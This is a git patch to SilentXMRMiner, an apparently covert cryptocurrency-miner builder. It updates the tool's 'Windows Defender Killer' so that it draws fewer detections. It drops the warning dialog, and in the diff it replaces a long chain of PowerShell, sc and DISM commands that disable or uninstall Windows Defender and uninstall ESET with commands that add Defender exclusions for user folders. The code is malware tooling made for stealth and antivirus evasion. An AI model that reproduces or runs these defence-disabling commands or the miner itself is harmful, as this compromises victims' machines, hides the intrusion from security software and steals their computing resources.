From 434320ff56df47dc30e4258078979e8f32399bb1 Mon Sep 17 00:00:00 2001 From: UnamSanctam Date: Fri, 14 May 2021 02:24:28 +0200 Subject: [PATCH] Updated to v1.3.4 * Made the Windows Defender Killer less intrusive, ironically to reduce detections --- README.md | 4 +++- SilentXMRMiner/Advanced.Designer.vb | 3 +-- SilentXMRMiner/Advanced.vb | 10 ++-------- SilentXMRMiner/Codedom.vb | 2 +- SilentXMRMiner/Form1.Designer.vb | 2 +- SilentXMRMiner/Resources/Uninstaller.cs | 2 +- 6 files changed, 9 insertions(+), 14 deletions(-) diff --git a/README.md b/README.md index 21d3106..a750b1b 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ -# SilentXMRMiner v1.3.3 - Based on Lime Miner v0.3 +# SilentXMRMiner v1.3.4 - Based on Lime Miner v0.3 Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**. @@ -37,6 +37,8 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w ## Changes +### v1.3.4 (14/05/2021) +* Made the Windows Defender Killer less intrusive, ironically to reduce detections ### v1.3.3 (13/05/2021) * Fixed possible CPU fluctuation * Added Stealth support for Windows 7 Task Manager diff --git a/SilentXMRMiner/Advanced.Designer.vb b/SilentXMRMiner/Advanced.Designer.vb index 26cd814..3e3249b 100644 --- a/SilentXMRMiner/Advanced.Designer.vb +++ b/SilentXMRMiner/Advanced.Designer.vb @@ -119,8 +119,7 @@ Partial Class Advanced Me.Label3.TabIndex = 73 Me.Label3.Text = "?" Me.TooltipHelper.SetToolTip(Me.Label3, "Will run commands to try and ""kill"" Windows Defender when the miner loader is sta" & - "rted. " & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This command requires Administrator privileges and WILL harm your comput" & - "er!") + "rted. " & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This command requires Administrator privileges!") ' 'Label6 ' diff --git a/SilentXMRMiner/Advanced.vb b/SilentXMRMiner/Advanced.vb index 1e71fa8..36cf35d 100644 --- a/SilentXMRMiner/Advanced.vb +++ b/SilentXMRMiner/Advanced.vb @@ -29,14 +29,8 @@ Private Sub toggleKillWD_CheckedChanged(sender As Object) Handles toggleKillWD.CheckedChanged If toggleKillWD.Checked Then - Select Case MessageBox.Show("This option is considered destructive and may harm your computer, the uninstaller may be able to revert some of its actions but not all. Do not use this on any important machines." + Environment.NewLine + Environment.NewLine + "Are you sure you want to enable this option?", "Warning!", MessageBoxButtons.YesNo, MessageBoxIcon.Warning) - Case DialogResult.Yes - toggleKillWD.Checked = True - toggleAdministrator.Checked = True - toggleUninstaller.Checked = True - Case Else - toggleKillWD.Checked = False - End Select + toggleAdministrator.Checked = True + toggleUninstaller.Checked = True End If End Sub End Class \ No newline at end of file diff --git a/SilentXMRMiner/Codedom.vb b/SilentXMRMiner/Codedom.vb index 7fc4285..16c0128 100644 --- a/SilentXMRMiner/Codedom.vb +++ b/SilentXMRMiner/Codedom.vb @@ -228,7 +228,7 @@ Public Class Codedom Public Shared Sub ReplaceGlobals(ByRef stringb As StringBuilder) If F.FA.toggleKillWD.Checked Then stringb.Replace("DefKillWD", "true") - stringb.Replace("#KillWDCommands", F.EncryptString("powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name=""Eset Security"" call uninstall")) + stringb.Replace("#KillWDCommands", F.EncryptString("powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit")) End If If F.FA.toggleEnableDebug.Checked Then diff --git a/SilentXMRMiner/Form1.Designer.vb b/SilentXMRMiner/Form1.Designer.vb index 5812599..132958b 100644 --- a/SilentXMRMiner/Form1.Designer.vb +++ b/SilentXMRMiner/Form1.Designer.vb @@ -346,7 +346,7 @@ Partial Class Form1 Me.MephForm1.Size = New System.Drawing.Size(535, 272) Me.MephForm1.SubHeader = "By Unam Sanctam, Credit to NYAN-x-CAT" Me.MephForm1.TabIndex = 0 - Me.MephForm1.Text = "Silent XMR Miner Builder 1.3.3" + Me.MephForm1.Text = "Silent XMR Miner Builder 1.3.4" ' 'MephTabcontrol2 ' diff --git a/SilentXMRMiner/Resources/Uninstaller.cs b/SilentXMRMiner/Resources/Uninstaller.cs index 4187577..167c463 100644 --- a/SilentXMRMiner/Resources/Uninstaller.cs +++ b/SilentXMRMiner/Resources/Uninstaller.cs @@ -126,7 +126,7 @@ public static void Main() Process.Start(new ProcessStartInfo { FileName = "cmd", - Arguments = "/c powershell -Command Remove-MpPreference -ExclusionPath '%cd%' & powershell -Command Remove-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Remove-MpPreference -ExclusionPath '%AppData%' & powershell -Command Remove-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $false & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $false & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $false & powershell -Command Set-MpPreference -DisableScriptScanning $false & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $false & powershell -Command Set-MpPreference -DisableIOAVProtection $false & powershell -Command Set-MpPreference -EnableControlledFolderAccess Enabled & sc config WinDefend start=enabled & sc start WinDefend & powershell -Command Start-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Enabled & powershell -Command Install-WindowsFeature -Name Windows-Defender & powershell -Command Add-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Enable-Feature /FeatureName:Windows-Defender /NoRestart /quiet & exit", + Arguments = "/c powershell -Command Remove-MpPreference -ExclusionPath '%cd%' & powershell -Command Remove-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Remove-MpPreference -ExclusionPath '%AppData%' & powershell -Command Remove-MpPreference -ExclusionPath '%Temp%' & exit", WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, Verb = "runas"